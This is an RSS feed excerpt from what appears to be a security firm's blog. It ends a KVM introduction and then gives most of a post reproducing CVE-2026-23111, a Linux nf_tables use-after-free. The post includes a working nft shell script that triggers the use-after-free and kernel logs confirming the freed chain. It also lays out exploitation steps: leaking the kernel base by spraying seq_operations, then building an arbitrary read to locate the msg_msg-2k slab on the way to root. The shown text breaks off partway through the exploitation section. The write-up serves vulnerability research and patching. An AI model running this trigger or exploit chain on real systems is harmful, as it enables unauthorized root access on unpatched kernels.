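&lt;p&gt;As an illustration, the CPUID signature is returned as three 32-bit registers (EBX, ECX, EDX) holding 12 bytes of ASCII. Python cannot execute CPUID itself, so the sketch below only decodes register values; the constants are the ones listed for KVM in the kernel’s CPUID documentation, and the function name is made up for this example.&lt;/p&gt;

```python
def decode_hypervisor_signature(ebx, ecx, edx):
    """Rebuild the 12-byte signature from the three 32-bit registers of leaf 0x40000000."""
    raw = b"".join(reg.to_bytes(4, "little") for reg in (ebx, ecx, edx))
    return raw.rstrip(b"\x00").decode("ascii")


# Register values documented for KVM guests in the kernel's CPUID documentation.
KVM_EBX, KVM_ECX, KVM_EDX = 0x4B4D564B, 0x564B4D56, 0x0000004D
signature = decode_hypervisor_signature(KVM_EBX, KVM_ECX, KVM_EDX)
```

&lt;p&gt;Here &lt;code&gt;signature&lt;/code&gt; is the string &lt;code&gt;KVMKVMKVM&lt;/code&gt;; the trailing NUL padding is stripped before decoding. A guest kernel performs the same comparison on the raw registers to decide whether KVM paravirtual features are available.&lt;/p&gt;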
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm7.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;KVM signature&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Another KVM attack surface is hardware configuration: since many security boundaries are delegated to the CPU, the VM’s security settings must be configured correctly to avoid violations. For instance, the AMD VMCB contains an MSR intercept bitmap field, which tells the CPU which MSR reads and writes must be intercepted. Mishandling these settings can result in a VM escape, as shown by Felix Wilhelm in the aforementioned P0 article (exploiting a TOCTOU in nested virtualization to create an overly privileged VM with arbitrary MSR read/write access, then using it to take control of the host).&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Conclusion&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This concludes the first part, an introduction to hardware virtualization and KVM. The next part(s) will be dedicated to the KVM debugging setup and the creation of a nested virtualization fuzzer.&lt;/p&gt;&lt;p&gt;Stay tuned!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Antoine Assier de Pompignan – Gravis&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;About Us&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Founded in 2021 and headquartered in Paris, &lt;strong&gt;FuzzingLabs&lt;/strong&gt; is a cybersecurity startup specializing in &lt;strong&gt;vulnerability research, fuzzing, and blockchain security&lt;/strong&gt;. We combine cutting-edge research with hands-on expertise to secure some of the most critical components in the blockchain ecosystem.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://fuzzinglabs.com/contact&quot;&gt;Contact us&lt;/a&gt; for an audit or long-term partnership!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Reproducing CVE-2026-23111: How One Character Can Change Everything</title>
<link>https://fuzzinglabs.com/repro-cve-2026-23111/</link>
<enclosure type="image/jpeg" length="0" url="https://fuzzinglabs.com/wp-content/uploads/2026/04/image.png"></enclosure>
<guid isPermaLink="false">UgZn9HlkNrm6Wq078_5ZT5XKME9xr793wMcgEQ==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:25 +0000</pubDate>
<description>Reproducing CVE-2026-23111: a single inverted condition in nf_tables leads to UAF, leaks, ROP chain, and full Linux kernel privilege escalation.</description>
<content:encoded>&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;To prepare for Pwn2Own Berlin 2026, we decided to reproduce a known kernel CVE on Red Hat (kernel 6.12.0-124.38.1.el10_1, which was the latest version at the time). We chose the &lt;code&gt;nf_tables&lt;/code&gt; subsystem because we were not very familiar with it and wanted to better understand its internals.&lt;/p&gt;&lt;h2&gt;TL;DR&lt;/h2&gt;&lt;p&gt;An inverted condition on the &lt;code&gt;catchall&lt;/code&gt; element in the &lt;code&gt;Abort Phase&lt;/code&gt; of &lt;code&gt;nf_tables&lt;/code&gt; transactions allows an unprivileged user to trigger a use-after-free. This UAF can be used to leak the kernel base address, then a heap address, and finally to execute a ROP chain that stack-pivots into &lt;code&gt;msg_msg-2k&lt;/code&gt; to get root privileges.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;What is nf_tables?&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;section&gt;
						&lt;div&gt;
					&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;&lt;code&gt;nf_tables&lt;/code&gt; is a subsystem of the Linux kernel that provides a framework for packet filtering. It is used by the &lt;code&gt;nft&lt;/code&gt; CLI tool to manage firewall rules, and it is a replacement for the older subsystems &lt;code&gt;iptables&lt;/code&gt;, &lt;code&gt;ip6tables&lt;/code&gt;, &lt;code&gt;arptables&lt;/code&gt;, and &lt;code&gt;ebtables&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;In order to filter packets, &lt;code&gt;nf_tables&lt;/code&gt; uses different objects (image from &lt;a href=&quot;https://www.youtube.com/watch?v=_1DTkkaNqfM&quot;&gt;this video&lt;/a&gt;):&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
				&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/structures.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
					&lt;/div&gt;
		&lt;/section&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;At a high level, &lt;code&gt;nf_tables&lt;/code&gt; is organized as a hierarchy: a table is the top-level container (usually per protocol family), which contains one or more chains that define packet-processing paths. Each chain is an ordered list of rules, and each rule is built from one or more expressions evaluated in sequence. A set is a reusable lookup structure that rules can query efficiently instead of hardcoding many individual conditions.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;First look at the bug&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Let’s first have a look at the CVE description:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate(). nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don’t need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct:&lt;/p&gt;&lt;/blockquote&gt;&lt;pre&gt;&lt;code class=&quot;code-line language-C&quot;&gt;nft_mapelem_activate():
    if (nft_set_elem_active(ext, iter-&amp;gt;genmask)) return 0; /* skip active, process inactive */
/* With the buggy catchall version: */
nft_map_catchall_activate():
    if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&amp;gt;use reference count. Each abort cycle permanently decrements chain-&amp;gt;use. Once chain-&amp;gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Luckily for us, the CVE description gives us a lot of information. Before diving into &lt;code&gt;nf_tables&lt;/code&gt;, let’s have a look at the &lt;a href=&quot;https://github.com/torvalds/linux/commit/8fdb05de0e2db89d8f56144c60ab784812e8c3b7#diff-233a9dea2c513f5d208bba55e0f8ef4e8a29f5c584d30b5815cfa6c2cf5361ec&quot;&gt;patch&lt;/a&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/patch-1024x191.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;A single character was removed: an exclamation mark. That tiny negation was enough to invert the activation logic in the abort path, which eventually enables a use-after-free.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Understanding the bug&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;From the description, there is an inverted condition in &lt;code&gt;nft_map_catchall_activate()&lt;/code&gt;. This function is used during the &lt;code&gt;Abort Phase&lt;/code&gt; to reactivate the catchall elements in a map.&lt;/p&gt;&lt;p&gt;To better understand what this means, let’s review the different &lt;code&gt;nf_tables&lt;/code&gt; transaction phases when sending a batch, i.e., several requests at once (image from &lt;a href=&quot;https://www.youtube.com/watch?v=_1DTkkaNqfM&quot;&gt;this video&lt;/a&gt;).&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/phase.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;section&gt;
						&lt;div&gt;
					&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;When a batch arrives, the different commands are processed in the &lt;code&gt;Prepare phase&lt;/code&gt;. This phase does not modify elements “in place”, but builds what we call the &lt;code&gt;next generation&lt;/code&gt;. If there is no failure during the &lt;code&gt;Prepare phase&lt;/code&gt;, the &lt;code&gt;next generation&lt;/code&gt; becomes the current generation during the &lt;code&gt;Commit phase&lt;/code&gt;. However, if there is an issue, the &lt;code&gt;Abort Phase&lt;/code&gt; is invoked and unwinds the different actions performed during the &lt;code&gt;Prepare phase&lt;/code&gt; in reverse order to restore the original state.&lt;/p&gt;&lt;p&gt;With that in mind, we can better understand the bug. If we send a batch that contains:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;a first command that deletes a map which contains a catchall element (sometimes represented by a “*”, because it catches everything)&lt;/li&gt;&lt;li&gt;a second command that fails&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Then during the &lt;code&gt;Abort Phase&lt;/code&gt;, the function &lt;code&gt;nft_map_catchall_activate()&lt;/code&gt;, which normally reactivates elements in the &lt;code&gt;catchall&lt;/code&gt; part of the map, will not reactivate them.&lt;/p&gt;&lt;p&gt;The description of the bug gives us even more information: if inside this &lt;code&gt;catchall&lt;/code&gt; element we have a verdict of type &lt;code&gt;GOTO&lt;/code&gt; (something like &lt;code&gt;{ * : goto chainX }&lt;/code&gt;), then &lt;code&gt;nft_data_hold()&lt;/code&gt; will never be called to restore the &lt;code&gt;chain-&amp;gt;use&lt;/code&gt; variable, which counts the number of references to a chain. This allows us to decrement this variable as many times as we want, and then delete and free this chain while some objects still refer to it (use-after-free).&lt;br/&gt;This simplified diagram shows the different steps to trigger the bug:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
				&lt;div&gt;
			&lt;div&gt;
						&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/trigger_bug.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
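&lt;p&gt;The reference-count drift described above can be replayed with a toy model. This is only a sketch, not kernel code: the &lt;code&gt;simulate&lt;/code&gt; function and its &lt;code&gt;use&lt;/code&gt; and &lt;code&gt;active&lt;/code&gt; variables are hypothetical stand-ins for &lt;code&gt;chain-&amp;gt;use&lt;/code&gt; and the catchall element’s activity state, and the starting count of 2 assumes that two catchall elements point to the chain.&lt;/p&gt;

```shell
#!/bin/sh
# Toy model of the chain use counter across one aborted DELSET.
# All names are illustrative; nothing here talks to the kernel.

# simulate MODE   (MODE is "buggy" or "fixed")
# Prints the use counter left after prepare + abort.
simulate() {
    mode=$1
    use=2       # assumption: two catchall "goto" elements reference the chain
    active=1    # the catchall element of the deleted map starts active

    # Prepare phase: DELSET deactivates the element and drops its reference.
    active=0
    use=$((use - 1))

    # Abort phase: the element should be re-activated and the reference restored.
    if [ "$mode" = "buggy" ]; then
        # Inverted check: inactive elements are skipped, active ones processed.
        if [ "$active" -eq 1 ]; then
            use=$((use + 1))
        fi
    else
        # Fixed check: active elements are skipped, inactive ones restored.
        if [ "$active" -eq 0 ]; then
            active=1
            use=$((use + 1))
        fi
    fi

    echo "$use"
}

echo "buggy abort leaves use = $(simulate buggy)"
echo "fixed abort leaves use = $(simulate fixed)"
```

&lt;p&gt;In this model every buggy abort cycle loses one reference, so repeating it (or deleting the remaining legitimate references) brings the counter to zero while a catchall element still points to the chain.&lt;/p&gt;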
				&lt;/div&gt;
					&lt;/div&gt;
		&lt;/div&gt;
					&lt;/div&gt;
		&lt;/section&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Reproduction in Bash&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;To make sure we understood this bug, we tried to trigger this UAF using the &lt;code&gt;nft&lt;/code&gt; CLI tool. Here is our commented script:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-bash&quot;&gt;#!/bin/sh

FILE_BASH=&amp;quot;file_bash&amp;quot;

# clean the environment
nft flush ruleset
rm -f &amp;quot;$FILE_BASH&amp;quot;

# create a table mytable
nft add table inet mytable
# create a chain mychain inside this table
nft add chain inet mytable mychain

# add to the table a map &amp;quot;mymap&amp;quot; with a default element, which will not be important here
nft add map inet mytable mymap { type ipv4_addr : verdict \; } 
# add the catchall element with a goto verdict to &amp;quot;mychain&amp;quot;
nft add element inet mytable mymap { \* : goto mychain } 

# same thing for the second map &amp;quot;triggermap&amp;quot;
nft add map inet mytable triggermap { type ipv4_addr : verdict \; } 
nft add element inet mytable triggermap { \* : goto mychain }


# Create a batch that first deletes a map, then tries to delete something that does not exist, in order to fail the batch and go into the abort phase
cat &amp;gt; &amp;quot;$FILE_BASH&amp;quot; &amp;lt;&amp;lt; &amp;#39;BATCH_CONTENT&amp;#39;
delete map inet mytable triggermap
delete map inet mytable bonjour
BATCH_CONTENT

# execute the batch
nft -f &amp;quot;$FILE_BASH&amp;quot;

# here mychain-&amp;gt;use should be decremented because the abort phase did not recover properly. We can abuse that by making the use counter reach 0 and then deleting the chain to get a UAF.

nft delete map inet mytable mymap
nft delete chain inet mytable mychain

# we should now have triggermap with a catchall element that points to a chain which no longer exists

# listing chains, maps, and sets
echo &amp;quot;CHAINS:&amp;quot;
nft list chains
echo &amp;quot;MAPS:&amp;quot;
nft list maps
echo &amp;quot;SETS:&amp;quot;
nft list sets&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This gives us (we added some logs in the kernel):&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;code-line&quot;&gt;[   34.575666] nf_tables_newsetelem called
[   34.576027] nft_add_set_elem called
[   34.580254] nft (314) used greatest stack depth: 11272 bytes left
[   34.584135] nf_tables_newsetelem called
[   34.584382] nft_add_set_elem called
[   34.589736] nft_verdict_uninit: chain use before : 2
[   34.590023] nft_verdict_uninit: chain use after : 1
[   34.590330] nf_tables_abort called
[   34.590619] __nf_tables_abort: reversing type=NFT_MSG_DELSET
[   34.590942] type of element in DELSET is NFT_SET_MAP
[   34.591218] interesting
[   34.591363] nft_map_activate called
[   34.591613] nft_map_catchall_activate called
[   34.591851] chain number of use 1
file_bash:2:25-31: Error: Could not process rule: No such file or directory
delete map inet mytable bonjour
                        ^^^^^^^
[   34.608980] nft_verdict_uninit: chain use before : 1
[   34.609417] nft_verdict_uninit: chain use after : 0
[   34.626538] nf_tables_delchain called
[   34.633648] nf_tables_chain_destroy called
[   34.635331] kfree chain-&amp;gt;name  @ 0xffff888009fa2b10
[   34.636627] kfree chain-&amp;gt;udata @ 0x0000000000000000
[   34.637953] kfree chain        @ 0xffff888009dc1680
CHAINS:
table inet mytable {
}
MAPS:
table inet mytable {
	map triggermap {
		type ipv4_addr : verdict
		elements = { * : goto �,�	�����*�	���� }
	}
}
SETS:
table inet mytable {
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With these logs, we can clearly see that we entered the &lt;code&gt;Abort Phase&lt;/code&gt;, that &lt;code&gt;nft_map_catchall_activate&lt;/code&gt; was called and never restored the &lt;code&gt;chain-&amp;gt;use&lt;/code&gt; variable, which allowed us to destroy the chain while &lt;code&gt;triggermap&lt;/code&gt; still had a reference to it. The corrupted chain name while listing the maps clearly shows a UAF.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Exploitation&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;h3&gt;What do we have exactly?&lt;/h3&gt;&lt;p&gt;It is now time to dive into the different structures and identify the exact primitive we obtained. As mentioned before, our map still has a reference to the &lt;code&gt;nft_chain&lt;/code&gt; structure, which has now been freed:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This structure is in the &lt;code&gt;kmalloc-cg-128&lt;/code&gt; cache, and for the first phase of this exploit, we will use its &lt;code&gt;name&lt;/code&gt; field to obtain an arbitrary leak. This field also goes into &lt;code&gt;kmalloc-cg-*&lt;/code&gt; caches, but the cache size depends on the size of the name.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/**
 *	struct nft_chain - nf_tables chain
 *
 *	@blob_gen_0: rule blob pointer to the current generation
 *	@blob_gen_1: rule blob pointer to the future generation
 *	@rules: list of rules in the chain
 *	@list: used internally
 *	@rhlhead: used internally
 *	@table: table that this chain belongs to
 *	@handle: chain handle
 *	@use: number of jump references to this chain
 *	@flags: bitmask of enum NFTA_CHAIN_FLAGS
 *	@bound: bind or not
 *	@genmask: generation mask
 *	@name: name of the chain
 *	@udlen: user data length
 *	@udata: user data in the chain
 *	@blob_next: rule blob pointer to the next in the chain
 *	@vstate: validation state
 */
struct nft_chain {
	struct nft_rule_blob		__rcu *blob_gen_0;
	struct nft_rule_blob		__rcu *blob_gen_1;
	struct list_head		rules;
	struct list_head		list;
	struct rhlist_head		rhlhead;
	struct nft_table		*table;
	u64				handle;
	u32				use;
	u8				flags:5,
					bound:1,
					genmask:2;
	char				*name;
	u16				udlen;
	u8				*udata;

	/* Only used during control plane commit phase: */
	struct nft_rule_blob		*blob_next;
	struct nft_chain_validate_state vstate;
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;h3&gt;Leaking kbase&lt;/h3&gt;&lt;p&gt;The first phase of this exploit is the same as in &lt;a href=&quot;https://kaligulaarmblessed.github.io/post/nftables-adventures-2/&quot;&gt;this write-up&lt;/a&gt;. We use &lt;code&gt;struct seq_operations&lt;/code&gt; to leak the kernel base address: when allocated by &lt;code&gt;single_open&lt;/code&gt;, this structure lands in &lt;code&gt;kmalloc-cg-32&lt;/code&gt;, and its first field, &lt;code&gt;start&lt;/code&gt;, is a pointer to the &lt;code&gt;single_start&lt;/code&gt; function.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Therefore, we just have to trigger our UAF, then spray &lt;code&gt;struct seq_operations&lt;/code&gt; in &lt;code&gt;kmalloc-cg-32&lt;/code&gt; so that one of these structs takes the place of the freed &lt;code&gt;name&lt;/code&gt;.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;For this first part, the chain name must be sized so that it is allocated in &lt;code&gt;kmalloc-cg-32&lt;/code&gt;, for example a size of 21.&lt;/p&gt;&lt;/blockquote&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/after_spray.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
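&lt;p&gt;To pick a name length for a given cache, it helps to compute which size class an allocation falls into. The sketch below assumes the usual x86_64 kmalloc size classes and assumes that a name of length N is allocated as N + 1 bytes (string plus terminating null byte); the helper names &lt;code&gt;kmalloc_bucket&lt;/code&gt; and &lt;code&gt;name_bucket&lt;/code&gt; are made up for this example.&lt;/p&gt;

```shell
#!/bin/sh
# kmalloc_bucket SIZE: print the smallest size class that can hold SIZE bytes.
# The class list is an assumption (common x86_64 configuration).
kmalloc_bucket() {
    size=$1
    for bucket in 8 16 32 64 96 128 192 256 512 1024 2048 4096 8192; do
        if [ "$size" -le "$bucket" ]; then
            echo "$bucket"
            return 0
        fi
    done
    return 1    # larger than the biggest class listed here
}

# name_bucket LENGTH: size class for a name of LENGTH characters,
# assuming one extra byte for the terminating null byte.
name_bucket() {
    kmalloc_bucket $(( $1 + 1 ))
}

echo "name of length 21  lands in the $(name_bucket 21)-byte class"
echo "name of length 100 lands in the $(name_bucket 100)-byte class"
```

&lt;p&gt;Under these assumptions a 21-character name falls in the 32-byte class, and the same rounding can be used to choose a length for any other target cache.&lt;/p&gt;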
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;After these steps, we can list the maps and leak the &lt;code&gt;single_start&lt;/code&gt; pointer (installed by &lt;code&gt;single_open&lt;/code&gt;) through the chain name. &lt;strong&gt;However, the pointer is leaked as a string, so if it contains a null byte we cannot recover the full function pointer. In this case, just reboot. 🙂&lt;/strong&gt;&lt;/p&gt;&lt;h3&gt;Leaking msg_msg-2k&lt;/h3&gt;&lt;p&gt;You will understand why later, but our next objective is to leak the address of the &lt;code&gt;msg_msg-2k&lt;/code&gt; slab.&lt;/p&gt;&lt;p&gt;To do so, we craft a stronger primitive: an arbitrary read. We trigger the same UAF as before, but instead of reallocating an object into the freed &lt;code&gt;name&lt;/code&gt; buffer, we reallocate one into the freed &lt;code&gt;nft_chain&lt;/code&gt; itself. We can then place an arbitrary pointer at the offset of the &lt;code&gt;name&lt;/code&gt; field and read from it when the chain name is listed.&lt;/p&gt;&lt;p&gt;As the replacement object we again use a &lt;code&gt;name&lt;/code&gt; buffer, this time the name of an &lt;code&gt;nft_table&lt;/code&gt;. The &lt;code&gt;nft_table&lt;/code&gt; structure itself is larger and does not land in &lt;code&gt;kmalloc-cg-128&lt;/code&gt;, but its name does if we choose the name length correctly.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/spray_nft_table.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
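&lt;p&gt;Because every value is read back through a name string, the null-byte caveat noted for the first leak applies to each later read as well. A quick way to check whether a 64-bit value would survive a string leak is sketched below; &lt;code&gt;has_null_byte&lt;/code&gt; is a hypothetical helper and the two addresses are made-up examples, not values from a real run.&lt;/p&gt;

```shell
#!/bin/sh
# has_null_byte HEX: succeed (status 0) if the 64-bit value contains a 0x00 byte.
# The value is handled as a hex string to avoid 64-bit integer overflow in sh.
has_null_byte() {
    hex=${1#0x}
    # Left-pad to 16 hex digits so leading zero bytes are counted too.
    while [ "${#hex}" -lt 16 ]; do
        hex="0$hex"
    done
    while [ -n "$hex" ]; do
        rest=${hex#??}         # everything after the first two digits
        byte=${hex%"$rest"}    # the first two digits, i.e. one byte
        if [ "$byte" = "00" ]; then
            return 0
        fi
        hex=$rest
    done
    return 1
}

# Example addresses are illustrative only.
for ptr in 0xffffffff81234567 0xffffffff81003560; do
    if has_null_byte "$ptr"; then
        echo "$ptr: contains a null byte, a string leak would be truncated"
    else
        echo "$ptr: can be leaked as a string"
    fi
done
```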
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This gives us an arbitrary read. We already have the kernel base address, and we now want the address of the &lt;code&gt;msg_msg-2k&lt;/code&gt; slab. To get there, we start from one of the kernel global variables: &lt;code&gt;init_ipc_ns&lt;/code&gt;, which is of type &lt;code&gt;ipc_namespace&lt;/code&gt;.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct ipc_namespace {
	struct ipc_ids	ids[3];

	int		sem_ctls[4];
	int		used_sems;

	unsigned int	msg_ctlmax;
	unsigned int	msg_ctlmnb;
	unsigned int	msg_ctlmni;
	struct percpu_counter percpu_msg_bytes;
	struct percpu_counter percpu_msg_hdrs;

	size_t		shm_ctlmax;
	size_t		shm_ctlall;
	unsigned long	shm_tot;
	int		shm_ctlmni;
	/*
	 * Defines whether IPC_RMID is forced for _all_ shm segments regardless
	 * of shmctl()
	 */
	int		shm_rmid_forced;

	struct notifier_block ipcns_nb;

	/* The kern_mount of the mqueuefs sb.  We take a ref on it */
	struct vfsmount	*mq_mnt;

	/* # queues in this ns, protected by mq_lock */
	unsigned int    mq_queues_count;

	/* next fields are set through sysctl */
	unsigned int    mq_queues_max;   /* initialized to DFLT_QUEUESMAX */
	unsigned int    mq_msg_max;      /* initialized to DFLT_MSGMAX */
	unsigned int    mq_msgsize_max;  /* initialized to DFLT_MSGSIZEMAX */
	unsigned int    mq_msg_default;
	unsigned int    mq_msgsize_default;

	struct ctl_table_set	mq_set;
	struct ctl_table_header	*mq_sysctls;

	struct ctl_table_set	ipc_set;
	struct ctl_table_header	*ipc_sysctls;

	/* user_ns which owns the ipc ns */
	struct user_namespace *user_ns;
	struct ucounts *ucounts;

	struct llist_node mnt_llist;

	struct ns_common ns;
} __randomize_layout;&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;RHEL doesn’t use &lt;code&gt;CONFIG_GCC_PLUGIN_RANDSTRUCT&lt;/code&gt; (more information in this &lt;a href=&quot;https://medium.com/@boutnaru/the-linux-kernel-macro-journey-randomize-layout-b611e4c597ff&quot;&gt;blog post&lt;/a&gt;) so we don’t have to worry about &lt;code&gt;__randomize_layout&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;This structure contains something interesting: the different &lt;code&gt;struct ipc_ids&lt;/code&gt;, with the first one being for semaphores, the second one for message queues, and the third one for shared memory (&lt;a href=&quot;https://tldp.org/LDP/lki/lki-5.html&quot;&gt;source&lt;/a&gt;). Using &lt;code&gt;pahole&lt;/code&gt;, we can get the data structures recursively with their offsets (&lt;code&gt;pahole -E -C ipc_namespace vmlinux&lt;/code&gt;):&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;struct ipc_namespace {
        struct ipc_ids {
                int                in_use;                                               /*     0     4 */
                short unsigned int seq;                                                  /*     4     2 */

                /* XXX 2 bytes hole, try to pack */

                struct rw_semaphore {
                        /* typedef atomic_long_t -&amp;gt; atomic64_t */ struct {
                                /* typedef s64 -&amp;gt; __s64 */ long long int counter;        /*     8     8 */
                        } count; /*     8     8 */
                        /* typedef atomic_long_t -&amp;gt; atomic64_t */ struct {
                                /* typedef s64 -&amp;gt; __s64 */ long long int counter;        /*    16     8 */
                        } owner; /*    16     8 */
                        struct optimistic_spin_queue {
                                /* typedef atomic_t */ struct {
                                        int    counter;                                  /*    24     4 */
                                } tail; /*    24     4 */
                        }osq; /*    24     4 */
                        /* typedef raw_spinlock_t */ struct raw_spinlock {
                                /* typedef arch_spinlock_t */ struct qspinlock {
                                        union {
[...]
                     void * xa_head;                                          /*    56     8 */
[...]&lt;/code&gt;
